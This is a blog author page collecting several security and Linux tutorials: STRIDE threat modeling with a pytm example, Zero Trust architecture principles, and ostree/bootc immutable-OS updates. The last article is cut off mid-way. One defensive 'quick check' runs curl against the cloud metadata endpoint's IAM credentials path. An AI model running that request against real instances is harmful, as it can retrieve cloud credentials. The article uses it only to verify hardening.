Vamshi Krishna Santhapuri, Author at Linuxcent

STRIDE Threat Modeling: Proactive Security Design for Architects

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 2
← Module 1: Core Mental Models · Module 2: Proactive Design · Module 3: Cloud-Native Hardening →

11 min read

TL;DR

STRIDE threat modeling is a checklist for finding design-level vulnerabilities before code exists: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege
Run it against a data-flow diagram, not against code — every process, data store, and trust boundary gets checked against all six categories
DREAD risk scoring turns “this is a threat” into a number, so you can prioritize which findings become engineering tickets first
Trust boundaries — anywhere data crosses from one privilege level to another — are where most real threats concentrate
Free, code-based tools (pytm, OWASP Threat Dragon) let you version-control your threat model the same way you version-control infrastructure
STRIDE run once at design time catches classes of bugs that a penetration test only catches after the system already shipped

The Big Picture: STRIDE Threat Modeling in One Checklist

Every element in a system — a process, a data store, a data flow, an external entity — can fail in up to six ways. STRIDE threat modeling names them so you check for all six instead of whichever one happened to occur to you.

STRIDE THREAT MODEL — APPLIED PER SYSTEM ELEMENT
──────────────────────────────────────────────────────────────
 Threat Category          Security Property Violated
──────────────────────────────────────────────────────────────
 S  Spoofing               Authenticity   — are you who you say?
 T  Tampering              Integrity      — was this modified?
 R  Repudiation            Non-Repudiation— can this be denied?
 I  Information Disclosure Confidentiality— who else can read this?
 D  Denial of Service      Availability   — can this be starved?
 E  Elevation of Privilege Authorization  — can this reach more than it should?
──────────────────────────────────────────────────────────────
       ↑ maps directly onto the Extended CIA Triad from Module 1

STRIDE threat modeling is a systematic way to find design flaws before a single line of code exists, by checking every element of a system against these six failure modes instead of relying on whoever’s reviewing the design to think of them unprompted.

Why “Shift Left” Needs a Checklist, Not Good Intentions

Module 1 closed by naming the “Shift Left Myth” — teams that call a CI security scanner “shifting left” when the actual architecture was never reviewed at the design phase at all. A CI scan finds vulnerabilities in code that already exists. STRIDE finds the ones that don’t need code to exist yet, because they’re baked into the design: a service that trusts an internal network by IP address, a queue with no message-origin verification, an admin API reachable from the same trust zone as public traffic.

A team building a new internal billing service skips a design review — “it’s internal, it’s fine” — and ships it trusting any caller on the VPC. Eight months later, a compromised marketing-analytics pod (unrelated team, unrelated purpose, same VPC) calls the billing API directly and issues refunds. Nothing was “hacked” in the traditional sense. The design simply never asked: what happens if something on this network isn’t who we assumed?

That’s a Spoofing failure, and STRIDE would have surfaced it in an hour-long design review, months before the analytics pod existed.

Running STRIDE Against a Data-Flow Diagram

STRIDE is applied to a Data-Flow Diagram (DFD) — not to source code, and not to infrastructure diagrams showing subnets and security groups. A DFD has four element types, and each type is only vulnerable to a subset of STRIDE:

 Element Type        Vulnerable To
 ──────────────────  ─────────────────────────────────
 External Entity     Spoofing, Repudiation
 Process              Spoofing, Tampering, Repudiation,
                       Info Disclosure, DoS, Elevation
 Data Store           Tampering, Info Disclosure, DoS,
                       (Repudiation if no access logging)
 Data Flow            Tampering, Info Disclosure, DoS

Processes are checked against all six categories because they’re where identity, logic, and privilege all live. Data stores can’t “spoof” anything — but they can absolutely be read or written by someone who shouldn’t, or overwhelmed.

Trust boundaries are drawn as dashed lines across the diagram anywhere a data flow crosses from one privilege or trust level to another: public internet → load balancer, application tier → database tier, one team’s service → another team’s service, on-prem → cloud. Every element sitting directly on a trust boundary gets checked first, because that’s structurally where real threats concentrate — an internal-only process that never sees a trust boundary is a much lower priority than an internet-facing one processing untrusted input.

The billing-service incident above is a trust-boundary failure by definition: the design never drew a boundary between “our service” and “anything else on the VPC,” so nothing on that (missing) boundary was ever checked.

Working the Six Categories

Spoofing — Can an entity convincingly pretend to be something it isn’t? Mitigations: mutual TLS, signed service tokens, SPIFFE/SPIRE identities instead of IP-based trust (Module 1’s Zero Trust principle, applied concretely).

Tampering — Can data be modified in transit or at rest without detection? Mitigations: TLS in transit, checksums/signatures on artifacts, database-level integrity constraints, immutable audit logs.

Repudiation — Can an actor perform an action and later credibly deny it? Mitigations: signed, centrally-shipped audit logs (CloudTrail, Kubernetes audit logs) that the actor cannot modify after the fact — this is why Module 1 called non-repudiation an architectural requirement, not a compliance checkbox.

Information Disclosure — Can data reach an entity that shouldn’t see it? Mitigations: encryption at rest and in transit, least-privilege IAM, field-level access control for sensitive data classes.

Denial of Service — Can an entity be starved of resources it needs to function? Mitigations: rate limiting, autoscaling with sane ceilings, circuit breakers, resource quotas per tenant.

Elevation of Privilege — Can an entity reach capabilities beyond what it was granted? Mitigations: strict RBAC, no ambient authority, explicit privilege boundaries between services — this is the category both the iam:PassRole privilege-escalation pattern (covered in the IAM series) and misconfigured S3 buckets escalating to admin access belong to.

Scoring What You Find: DREAD

STRIDE tells you what kind of threat exists. It says nothing about how bad it is. A dozen findings with no prioritization is not actionable — DREAD converts each finding into a 0–10 score across five dimensions so engineering can triage like any other backlog:

 D  Damage Potential     — how bad is the worst case if exploited?
 R  Reproducibility      — how reliably can it be triggered?
 E  Exploitability       — how much skill/access does it require?
 A  Affected Users       — how much of the system/user base is exposed?
 D  Discoverability      — how easy is it to find unassisted?

 DREAD score = average of the five (0–10 scale)

The billing-service Spoofing finding above scores high on Damage (financial loss), high on Reproducibility (any pod on the VPC, repeatably), moderate on Exploitability (requires being on the VPC — not zero-effort, but not hard either), high on Affected Users (the entire billing system), and low-to-moderate on Discoverability (not obvious without VPC access, but not hidden either). That combination — high damage, high reproducibility — is exactly the profile that goes to the top of the backlog, above findings that are theoretically worse but require nation-state-level access to trigger.

Doing This as Code, Not a Whiteboard Session

A whiteboard threat model is useful for a workshop and useless six months later when the architecture has changed and nobody updates the photo. pytm and OWASP Threat Dragon let you define the data-flow diagram and its trust boundaries as a file, review it in a pull request, and regenerate the DFD and a STRIDE finding report on every change.

# threatmodel.py (pytm)
from pytm import TM, Server, Datastore, Dataflow, Boundary

tm = TM("Billing Service")
internet = Boundary("Public Internet")
internal = Boundary("Internal VPC")

api = Server("Billing API")
api.inBoundary = internal
db = Datastore("Billing DB")
db.inBoundary = internal

caller = Dataflow(api, db, "Query balance")
caller.protocol = "PostgreSQL"
caller.isEncrypted = True

tm.process()

# Generate the DFD and run the STRIDE analysis
$ python3 threatmodel.py --dfd | dot -Tpng -o dfd.png
$ python3 threatmodel.py --report json > findings.json

# Findings surface automatically per element/boundary, e.g.:
# [ELEVATION OF PRIVILEGE] Billing API -> Billing DB crosses no
# authentication boundary check; caller identity is not verified
# before query execution.

The model lives next to the code it describes, diffs like any other file, and a reviewer sees exactly what trust boundary changed when a new dependency gets added — instead of discovering it in production eight months later.

Production Gotchas

A threat model with no owner goes stale in one sprint. Assign the DFD file the same ownership as the service’s Terraform or Helm chart — whoever changes the architecture updates the model in the same PR.

STRIDE without trust boundaries drawn is just a vocabulary exercise. Teams sometimes run through all six letters against a whole system at once with no boundaries marked, producing a vague list nobody acts on. Draw the boundaries first; findings should cluster around them.

DREAD scores drift toward “everything is a 7” without calibration. Anchor each dimension with 2–3 concrete example findings from your own systems before scoring new ones, or every finding regresses to the mean and the prioritization signal disappears.

A code-based threat model is not a substitute for a design review conversation. pytm output is a starting point for discussion between the architect and the team, not a report to file away unread.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	ID.RA-01	Asset vulnerabilities are identified and documented — threat modeling is the design-phase mechanism for this.
NIST SP 800-207	Zero Trust	Trust boundary analysis is the direct architectural expression of “never trust, always verify.”
ISO 27001:2022	8.25	Secure development life cycle — threat modeling required at the design phase, not just pre-release testing.
SOC 2	CC7.1	The organization identifies and evaluates changes that could impact the system of internal control.

Key Takeaways

STRIDE checks every system element against six named failure modes so nothing gets skipped because no one thought of it
Run it against a data-flow diagram with trust boundaries explicitly drawn — findings cluster where boundaries are
DREAD turns qualitative findings into a prioritized, comparable backlog
Code-based threat modeling (pytm, Threat Dragon) keeps the model current instead of a stale whiteboard photo
A threat model needs an owner tied to the architecture it describes, or it goes stale in one sprint

What’s Next

Module 2 gave you the process for finding design flaws before code exists. Module 3 takes one specific, high-stakes trust boundary — the AWS identity perimeter — and shows exactly how IMDSv2, IAM policy design, and infrastructure-as-code scanning close the Elevation of Privilege and Spoofing findings that STRIDE surfaces most often in cloud-native systems.

Next: Module 3: Cloud-Native Hardening — Securing the AWS Identity Perimeter

Get the full masterclass in your inbox → linuxcent.com/subscribe

Cybersecurity Architecture Principles: Beyond the Castle-and-Moat

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 1
← All Masterclass Modules · Module 1: Core Mental Models · Module 2: Proactive Design →

12 min read

Introduction

Modern cybersecurity architecture principles trace back to a single admission: in 2010, Google published the “BeyondCorp” whitepaper, the first high-profile confession from a tech giant that the corporate network — the “internal” network everyone trusted by default — was no longer safe. For decades, security was built on the Castle-and-Moat model: a hardened perimeter (the firewall) protecting a soft, trusted interior.

If you were inside the moat, you were trusted. If you were outside, you were a threat.

The rise of cloud, mobile, and sophisticated lateral-movement attacks has rendered this model obsolete. If an attacker compromises a single developer’s laptop or a single vulnerable Jenkins server, they are “inside the castle.” In a legacy architecture, the game is over.

Module 1 of the Masterclass establishes the core cybersecurity architecture principles required to move beyond the perimeter. We redefine the CIA Triad for the cloud era and establish the foundational shift to Zero Trust.

TL;DR

The CIA Triad is no longer enough: Modern architecture requires the Extended CIA Triad, adding Authenticity and Non-Repudiation to Confidentiality, Integrity, and Availability.
Defense-in-Depth is about redundant layers: A single failure (e.g., a leaked IAM key) should not lead to a total breach.
Zero Trust rejects implicit trust: No network location is trusted. Every request is verified explicitly based on identity, device posture, and context.
Security is a Product Requirement: Architectural security must be integrated into the SDLC (Software Development Lifecycle) from the “Definition” phase, not bolted on at “Deployment.”

The Big Picture: From Castle-and-Moat to Zero Trust

The fundamental shift in architecture is the transition from Network-Centric Trust to Identity-Centric Trust.

┌─────────────────────────────────────────────────────────────────────────────┐
│                   THE ARCHITECTURAL SHIFT: PERIMETER TO IDENTITY            │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│  LEGACY: CASTLE-AND-MOAT                  MODERN: ZERO TRUST ARCHITECTURE   │
│  (Implicit Trust)                         (Explicit Verification)           │
│                                                                             │
│  [ External ]                             [ External ]                      │
│       │                                        │                            │
│  ┌────▼────┐                              ┌────▼────────┐                   │
│  │ FIREWALL│ (The Moat)                   │ IDENTITY    │                   │
│  └────┬────┘                              │ PROVIDER    │                   │
│       │                                   └────┬────────┘                   │
│  ┌────▼──────────────┐                         │                            │
│  │ TRUSTED INTERIOR  │                    ┌────▼────────┐                   │
│  │ (soft center)     │                    │ POLICY      │                   │
│  │ [App] [DB] [Log]  │                    │ ENGINE      │                   │
│  └───────────────────┘                    └────┬────────┘                   │
│                                                │ (Always Verify)            │
│       FAILURE MODE:                       ┌────▼────────┐                   │
│       Compromised VPN =                   │ RESOURCE    │                   │
│       Full Access                         │ [App] [DB]  │                   │
│                                           └─────────────┘                   │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘

1. The Extended CIA Triad Deep-Dive

Every security decision you make as an architect eventually maps back to the CIA Triad. But for modern systems, the “Classic CIA” (Confidentiality, Integrity, Availability) is missing the two pillars that handle identity and accountability.

Confidentiality (Protecting the Data)

At Rest: AES-256 encryption for S3 buckets or RDS instances.
In Transit: TLS 1.3 for every internal and external API call.
In Execution: Using Trusted Execution Environments (TEEs) or eBPF-based visibility to ensure memory isn’t being scraped.

Integrity (Trusting the Data)

Hashing: Using SHA-256/512 to verify that the container image you pulled is the exact one you built.
Digital Signatures: Signing your CI/CD artifacts so the production cluster only runs code signed by your build system.
FIM (File Integrity Monitoring): Detecting when a binary in /usr/bin is modified on a live node.

Availability (Ensuring Access)

Resilience: Multi-AZ deployments and automated failover.
Protection: AWS Shield or Cloudflare to absorb L3/L4 and L7 DDoS attacks.
Immutable Backups: Protecting data from ransomware using WORM (Write Once, Read Many) storage.

Authenticity & Non-Repudiation (The “Extended” Pillars)

Authenticity: Proving the caller is who they say they are (MFA, Client Certificates).
Non-Repudiation: Ensuring an action cannot be denied later. This is where Secure Audit Logs (CloudTrail, Kubernetes Audit) become architectural requirements, not just compliance checkboxes.

2. Core Architecture Principles: Defense-in-Depth

Defense-in-Depth is often misunderstood as “buying more tools.” In architecture, it means Functional Redundancy of Controls.

Think of it as a series of checks where no single check is the “God Gate.”

Policy Layer: SCPs (Service Control Policies) that disable entire AWS regions.
Perimeter Layer: WAF rules blocking SQL injection at the edge.
Identity Layer: MFA required for every console and CLI session.
Network Layer: Security Groups and Micro-segmentation (Cilium/Istio).
Endpoint Layer: EDR (CrowdStrike/Tetragon) monitoring for anomalous process execution.
Data Layer: Encryption with KMS keys that the application role must explicitly be granted access to.

Practitioner Depth: A classic failure is relying on a VPN for access control. If the VPN is breached, the “Depth” is revealed to be zero. A true Defense-in-Depth architecture assumes the VPN is breached and relies on the subsequent layers (Identity and Data encryption) to stop the attacker.

3. Dismantling the Castle-and-Moat (Zero Trust)

The architectural shift from perimeter to identity — legacy castle-and-moat versus modern zero trust architecture — Left: castle-and-moat — one firewall decision grants access to the whole trusted interior. Right: zero trust — every request is verified against identity, policy, and context before reaching an isolated resource.

Zero Trust is the architectural implementation of the principle: “Never Trust, Always Verify.”

The Three Pillars of ZTA (NIST SP 800-207)

Continuous Verification: You don’t just verify at login. You verify every single request.
Limit Blast Radius (Micro-segmentation): If a web server is compromised, it should have no network path to the database except on the specific port required for the application.
Automate Context-Aware Response: If a user logs in from a new country and immediately tries to delete an S3 bucket, the architecture should automatically step up to MFA or revoke the session.

Zero Trust for IAM: We covered this extensively in IAM Episode 12. In architecture, this means moving the “Trust Boundary” from the edge of the VPC to the edge of the individual service or container.

4. Integration with the Software Lifecycle (SDLC)

Security architecture that exists only on a whiteboard is a liability. It must be integrated into the product management and development workflow.

The “Shift Left” Myth

Many teams talk about “shifting left” (moving security earlier in the cycle) but only implement it as a “pre-commit hook” or a “CI scan.”

True Shift Left is Architectural:
– Module 2 of this series covers Threat Modeling. This happens during the Design phase, before code exists.
– Module 3 covers Hardening. This happens during the Infrastructure-as-Code phase.

If you are catching architectural flaws during a “Penetration Test” (Shift Right), you have already failed Module 1.

Quick Check: Is Your Architecture “Leaky”?

Run these three checks on your environment to see if you are still relying on implicit trust:

# 1. Check for wide-open S3 buckets (Network-level trust check)
aws s3api get-public-access-block --bucket <your-bucket>
# Success: BlockPublicAcls/Policy/RestrictPublicBuckets should all be TRUE.

# 2. Check if your nodes can reach the IMDSv1 endpoint (Metadata spoofing check)
# Run this from INSIDE a pod:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Success: Should return a 403 or hang if IMDSv2 is enforced (Module 3).

# 3. Check for "God Roles" in your K8s cluster
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin")'
# Success: Only your cluster management tool (e.g., ArgoCD) should be listed.

Production Gotchas

Latency vs. Security: Deep Packet Inspection (DPI) in a WAF or a Service Mesh (Istio) adds latency. You must architect for this by using Fast-Path hooks like XDP (covered in eBPF Episode 07) where possible.
The “Admin” Trap: Most breaches don’t happen because of a complex exploit; they happen because an administrator turned off MFA to “debug” a problem and never turned it back on. Architecture must enforce Non-Bypassable Controls.
Audit Logs are a DDoS Vector: If you log every packet at the kernel level without sampling, you will crash your logging pipeline before the attacker even finishes their scan.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	GV.PO-01	Establish cybersecurity policy integrated with organizational SDLC.
NIST SP 800-207	Zero Trust	No implicit trust; identity-based access; continuous verification.
ISO 27001:2022	5.15	Access control must be based on business and security requirements.
SOC 2	CC6.1	Logical access controls must restrict access to authorized users/processes.

Key Takeaways

The Perimeter is a myth: Assume the attacker is already in your network.
Extended CIA: Authenticity and Non-Repudiation are the modern requirements for identity-based architecture.
Defense-in-Depth: Functional redundancy means no single control failure leads to a total breach.
Zero Trust: Move the trust boundary to the resource level, not the network level.

What’s Next

Foundational models are the “Why.” Module 2 covers the “How”—specifically, how to systematically identify threats using the STRIDE framework and calculate risk using DREAD.

Threat modeling is the single most important skill for a Security Architect. It’s how you stop vulnerabilities before they are even typed into an IDE.

Next: Module 2: Proactive Design — Threat Modeling with STRIDE

Get the full masterclass in your inbox → linuxcent.com/subscribe

Atomic OS Updates Explained: How ostree and bootc Actually Work

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

Immutable OS Series, Episode 2
← EP01: What Is an Immutable OS? · EP02: Atomic OS Updates Explained · All Immutable OS Episodes →

TL;DR

Atomic OS updates explained at the mechanism level: ostree stores every deployment as a content-addressed commit, not a set of files you overwrite — “atomic” is a property of the filesystem layout, not a promise a script makes
The actual atomicity boundary is a single bootloader configuration write — everything before that point is fully reversible, and everything after it is a clean boot into a complete, self-contained deployment
bootc builds on the same ostree deployment model but starts from a Containerfile, so building a bootable OS image uses the same toolchain as building an application container
Power loss mid-update is a non-event: the system reboots into whatever the bootloader pointed at before the write, because the new deployment was never referenced until that one atomic write succeeded
Rollback targets aren’t kept forever — garbage collection and configurable deployment limits mean “you can always roll back” has a real, finite window
This is the mechanism EP01 described in outline; this episode is what actually happens on disk

The Big Picture: A Commit Graph, Not a File Tree

ostree REPOSITORY (content-addressed objects)
─────────────────────────────────────────────
  commit A (hash 8f2a1c...)  ──parent──▶  commit B (hash 3b7e9d...)
       │                                        │
       │ checked out as                         │ checked out as
       ▼                                        ▼
  /ostree/deploy/os/deploy/8f2a1c...    /ostree/deploy/os/deploy/3b7e9d...
  (READ-ONLY bind mount → /)            (READ-ONLY bind mount → /, once active)

BOOTLOADER CONFIG (the atomicity boundary)
─────────────────────────────────────────────
  grub.cfg / loader entries
       │
       └── points to exactly ONE deployment directory at a time
           Changing this pointer IS the update. Nothing else has
           to happen for the new deployment to become "the OS."

Atomic OS updates explained simply: ostree never edits a running deployment’s files. It writes an entirely new, complete deployment as a set of immutable, content-addressed objects somewhere else on disk, and the update becomes real the instant a single bootloader entry is rewritten to point at it. EP01 showed this from the outside — rpm-ostree status, rollback, a clean before/after. This episode is what’s actually happening underneath those commands.

Every Deployment Is a Commit, Not a Directory You Edited

A traditional package manager mutates files in place: apt upgrade overwrites /usr/bin/curl with a new binary, in the same inode, on the same live filesystem the kernel and every running process are using. If that write is interrupted, or if two updates race, the result is whatever state the filesystem happened to be in when things stopped — there’s no defined “before” state to return to, because the before state was destroyed in place.

This is the same declarative-artifact idea Stratum’s HardeningBlueprint YAML applies to OS hardening — the artifact either fully exists or the build failed, with nothing skippable in between — extended down to the filesystem itself.

ostree does something structurally different: every file in a deployment is stored as an object named by the SHA-256 hash of its content, inside a repository (/ostree/repo). A deployment is a commit — a tree of these hashed objects, checksummed all the way up, the same content-addressing model Git uses for a repository’s history. Deploying an update means:

Pull or build the new commit into the local ostree repository (pure object storage — this doesn’t touch the running system at all)
Check out that commit into a new deployment directory (/ostree/deploy/<os>/deploy/<checksum>) — still doesn’t touch the running system
Write a new bootloader entry pointing at that new deployment directory
Reboot

Steps 1 and 2 can take minutes, involve gigabytes of I/O, and fail halfway through with zero consequence — the running system’s deployment directory was never opened for writing. There is no partial-update state visible to anything, because nothing that’s currently running was ever touched.

The Atomicity Boundary: One Bootloader Write

“Atomic” specifically refers to step 3. Rewriting a bootloader entry (a GRUB grub.cfg regeneration, or a systemd-boot loader entry file) is small enough to be a single filesystem operation — either the new entry exists on disk, or it doesn’t. There’s no meaningful “half-written bootloader entry” state that a power failure can leave you in: at boot, the firmware reads whatever bootloader configuration fully exists, and that configuration names exactly one deployment.

POWER LOSS DURING STEP 1 or 2 (pulling/staging the new commit)
────────────────────────────────────────────────────────────
Next boot: bootloader entry still points at the OLD deployment.
The new commit's partial objects sit in the repo, orphaned,
inert. System boots exactly as if the update never started.

POWER LOSS DURING STEP 3 (bootloader entry write)
────────────────────────────────────────────────────────────
Filesystem-level atomic rename guarantees the entry write itself
either completes or doesn't. Next boot: either the old deployment
(write didn't land) or the new one (write landed) — never a
corrupted bootloader config caught in between.

POWER LOSS AFTER STEP 3, BEFORE REBOOT
────────────────────────────────────────────────────────────
Doesn't matter — the running system hasn't changed. The new
deployment activates on the NEXT boot, whenever that happens.

This is the property EP01 called “the system is never caught half-updated” — and now you can see exactly why: every step before the bootloader write is invisible to the running system, and the bootloader write itself is small enough that the filesystem’s own atomic-rename guarantee covers it. There’s no custom transaction logic to trust. It’s a property of doing the update in the right order, using a write that was already atomic.

bootc: The Same Model, a Container Build Toolchain

bootc uses this identical deployment mechanism — the on-disk layout, the bootloader swap, the rollback behavior are all the same ostree machinery. What bootc changes is how the commit gets built in the first place.

# Containerfile — this IS the OS image definition
FROM quay.io/fedora/fedora-bootc:41

RUN dnf install -y nginx && \
    systemctl enable nginx && \
    dnf clean all

# Standard container build — no special OS-image tooling required

# Build it exactly like an application container
$ podman build -t myregistry.example.com/os/web-node:v12 .
$ podman push myregistry.example.com/os/web-node:v12

# On the target machine — pulls the image, converts it to an
# ostree commit, stages it as the next deployment
$ bootc switch myregistry.example.com/os/web-node:v12
Queued for next boot: myregistry.example.com/os/web-node:v12
Please reboot to complete the update.

$ systemctl reboot

bootc switch and bootc upgrade do the same three-step dance as raw ostree — pull the new commit (here, derived from a container image’s layers instead of an RPM-based tree), stage a deployment directory, write the bootloader entry — the difference is entirely in step 1: bootc converts OCI container image layers into an ostree commit instead of building one from package installation directly. Your existing container registry, existing Containerfile conventions, and existing image-signing pipeline all apply unchanged to what is, underneath, a bootable operating system.

Where ostree and bootc Actually Diverge

	Raw ostree (Fedora CoreOS style)	bootc
Image defined as	`rpm-ostree compose` treefile (custom format)	Standard `Containerfile`
Build tooling	ostree/rpm-ostree-specific	Any OCI-compatible builder (`podman`, `buildah`, `docker`)
Registry/distribution	ostree’s own HTTP-based repo protocol, or OSTree-in-OCI	Standard container registry (Quay, Docker Hub, ECR, GHCR)
Deployment mechanism on disk	ostree commits, A/B deployments	Identical — ostree commits, A/B deployments
Rollback command	`rpm-ostree rollback`	`bootc rollback`
Best fit	Teams already fluent in ostree/ Fedora tooling	Teams that want OS images to fit their existing container CI/CD

Nothing about atomicity, rollback safety, or the deployment model changes between the two — bootc’s entire value proposition is packaging the same guarantee behind tooling most infrastructure teams already have muscle memory for.

The Part EP01 Didn’t Mention: Rollback Has a Shelf Life

“The previous deployment is always intact for rollback” (EP01’s phrasing) is true, but not indefinitely. Each deployment consumes real disk space — a full OS tree’s worth of objects, though ostree deduplicates identical objects across commits so an incremental update doesn’t cost a second full copy. Two mechanisms limit how far back you can actually roll:

Deployment count limits. Most configurations keep a bounded number of deployments (commonly 2–3). Once you’ve upgraded past that limit, the oldest deployment is pruned — rpm-ostree cleanup or an automatic policy removes it, and its objects become eligible for garbage collection if nothing else references them.

Garbage collection reclaims orphaned objects. ostree prune (or rpm-ostree cleanup -p) removes any object in the repository not reachable from a currently-kept deployment or a pinned ref. If you pruned a deployment last week and you need to roll back to it today, that commit is gone — not degraded, not slow to restore, simply no longer present.

# See exactly what's kept and what's eligible for cleanup
$ ostree admin status
  fedora-coreos 38.20240210.3.0 (booted)   # current
  fedora-coreos 38.20240115.2.0            # one rollback available

# Pin a deployment explicitly if you need a longer-lived rollback
# target than the default retention policy provides
$ ostree admin pin 1

If your incident-response plan assumes “we can always roll back to last month’s known-good state,” verify that against your actual retention policy — the default is usually one previous deployment, not an archive.

Quick Reference

# Inspect the commit graph and current deployments
ostree admin status                      # deployments + which is booted
ostree log <ref>                         # commit history for a branch
ostree show <checksum>                   # inspect a specific commit

# rpm-ostree (Fedora CoreOS / Silverblue)
rpm-ostree status                        # current + staged, same as EP01
rpm-ostree cleanup -p                    # prune old deployments + GC

# bootc
bootc status                             # current + staged image
bootc switch <image-ref>                 # move to a different image
bootc upgrade                            # pull latest tag, stage it
bootc rollback                           # revert to previous deployment

Production Gotchas

“Atomic” doesn’t mean “instant.” Staging a new deployment can take as long as a full OS install — the atomicity guarantee is about the swap being indivisible, not about the whole process being fast. Budget real time for the pull-and-stage phase in maintenance windows.

Deduplication means disk usage doesn’t scale linearly with deployment count, but it isn’t free either. A kernel or major package version bump touches enough objects that “just keep 5 deployments for safety” can use more disk than teams expect. Monitor /ostree/repo size, don’t assume it’s negligible.

Pinning a deployment and forgetting about it silently defeats garbage collection. ostree admin pin is the right tool for “I need to guarantee this stays available,” but a pinned deployment never gets reclaimed automatically — audit pins periodically or disk usage grows unbounded.

bootc’s registry dependency is a new failure mode ostree-native updates didn’t have. If your container registry is unreachable, bootc upgrade fails the same way a registry-down event fails an application deployment — factor registry availability into your OS update SLA the same way you already do for app deployments.

Key Takeaways

Every ostree deployment is a content-addressed commit, not a set of files mutated in place — that’s what makes “atomic” a filesystem property instead of a script’s promise
The actual atomicity boundary is a single bootloader entry write; everything before it is invisible to the running system, everything after it takes effect on next boot
bootc uses the identical deployment mechanism, but builds commits from standard Containerfiles and distributes them through standard container registries
Rollback is real but bounded — deployment limits and garbage collection mean “always roll back” has a specific, checkable retention window, not an unlimited one
ostree and bootc differ in build/distribution tooling, not in the safety guarantees the deployment model provides

What’s Next

EP02 covered the mechanism in the abstract. EP03 runs it day-to-day — Fedora CoreOS and Silverblue in practice: what changes about dnf install, package layering, troubleshooting, and rollback when you’re actually living on top of this model instead of reading about it.

Next: EP03 — Fedora CoreOS / Silverblue in Practice

Get EP03 in your inbox when it publishes → linuxcent.com/subscribe

What Is an Immutable OS — and Why Hardening Isn’t Enough

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

Immutable OS Series, Episode 1
← Stratum EP06: Stratum — OS Hardening as a Platform · EP01: What Is an Immutable OS? · EP02: Atomic OS Updates Explained →

TL;DR

An immutable OS is one where the running root filesystem is read-only — the only way to change it is to boot a new, versioned image, never to mutate the one that’s live
Hardening an image proves it’s correct at build time. Immutability is what keeps that proof true after the image boots into production
The mechanism is atomic A/B updates: a new OS image is staged fully, then swapped in as one operation — the system is never caught half-updated
A bad update is one command away from undone: rpm-ostree rollback && systemctl reboot — no reinstall, no image rebuild
bootc, Fedora CoreOS/Silverblue, and Talos Linux are three real implementations of this model, each targeting a different deployment shape
This is not a replacement for Stratum’s hardening pipeline — it’s what keeps a hardened image hardened after it ships

The Big Picture: A Snapshot vs. a Guarantee

TRADITIONAL MUTABLE OS                    IMMUTABLE OS
────────────────────────                  ────────────

Golden image (grade: A)                   Deployment A (active, read-only)
        │ boots into prod                          │
        ▼                                           │  atomic swap
Running root filesystem (read-write)                ▼
        │                                  Deployment B (staged)
        │  SSH fix, config-mgmt run,               │
        │  ad-hoc package install                   │  if boot fails
        ▼                                           ▼
Drifted state — no build artifact         Rollback (one command,
matches what's actually running            no reinstall)

An immutable OS is a system whose root filesystem cannot be changed in place — every change ships as a new, complete, versioned image, and the system swaps to it atomically or not at all. That’s the one-sentence answer, and it’s the reason this series exists: a hardening pipeline can prove an image is correct on the day it’s built, but on a traditional mutable root filesystem, nothing stops that proof from becoming false the day after.

The Gap Stratum’s Grade Doesn’t Cover

Stratum’s series ended with a hardened, graded, pipeline-gated image — POST /api/pipeline/scan fails the build if the grade drops below B, so an unhardened image never reaches production. That solved a real problem: images used to ship broken by default, and now they don’t.

But watch what happens six weeks later. An on-call engineer SSHes into a production node at 2 a.m. to unblock an incident and leaves behind a one-line iptables rule that was never reviewed. A config-management run pushes an unrelated package upgrade because someone’s playbook target list was too broad. A well-meaning teammate installs a debugging tool “just for now” and forgets to remove it. None of this touches the build pipeline. None of it fails a scan, because no scan runs again after the image ships.

Six months later, an auditor asks for evidence that the instance matches its compliance grade. The honest answer is: it did, once, the day it was built. Nobody can say what’s true about it now — the golden image and the running system are two different, unreconciled things.

That’s the gap. Hardening is a build-time guarantee. Immutability is what makes it a runtime guarantee too, because there’s no path left for a change to happen except through the build pipeline that produced the image in the first place.

From Golden Images to Immutable OS: A Short History

Golden images (Stratum’s territory) solved the “every instance starts insecure” problem by baking the correct configuration in at build time — the same idea as infrastructure-as-code applied to an OS baseline. Configuration management tools (Ansible, Chef, Puppet) then tried to solve drift by re-applying the desired state on a schedule, converging the system back toward correctness every run.

Convergence is not the same as prevention. A config-management run that fires every 30 minutes still leaves a 29-minute window where the system can be anything. And convergence tools can only fix drift they know to look for — an ad-hoc apt install that isn’t in anyone’s playbook just sits there, invisible, until someone happens to notice.

Immutable OS designs remove the window entirely. If the root filesystem is mounted read-only, apt install on a running node doesn’t drift the system — it fails, because there’s nowhere to write the new package. The only way to add that package is to build a new image and boot into it. Prevention replaces convergence.

How Atomic Updates Actually Work

Golden image vs immutable OS — atomic A/B deployment and rollback compared to a traditional mutable root filesystem drifting after boot — Left: a hardened golden image drifts once it’s live on a mutable root filesystem. Right: an immutable OS stages the next image fully before swapping to it atomically, with rollback as a first-class operation.

The core mechanism, used by ostree-based systems (Fedora CoreOS, Silverblue) and bootc alike, is A/B deployment:

Two deployment slots exist on disk at all times — call them A (active) and B (staged). Only one is booted at a time.
An update downloads and assembles the entire new OS image into the inactive slot. This can take minutes. The running system is completely unaffected while it happens — there is no partial state visible to production traffic.
The bootloader entry swaps atomically. This is a single operation, not a sequence of file writes — the system either boots the new deployment on next reboot, or it doesn’t. There’s no window where half the files are new and half are old.
If the new deployment fails to boot or fails a health check, rolling back means booting the previous slot — the old deployment was never deleted, never modified. It’s still exactly what it was before the update.

# Check current and staged deployments
$ rpm-ostree status
State: idle
Deployments:
● ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240210.3.0 (2024-02-10T09:14:22Z)
                   Commit: 8f2a1c...

  ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240115.2.0 (2024-01-15T11:02:03Z)
                   Commit: 3b7e9d...

# Roll back to the previous deployment — no rebuild, no reinstall
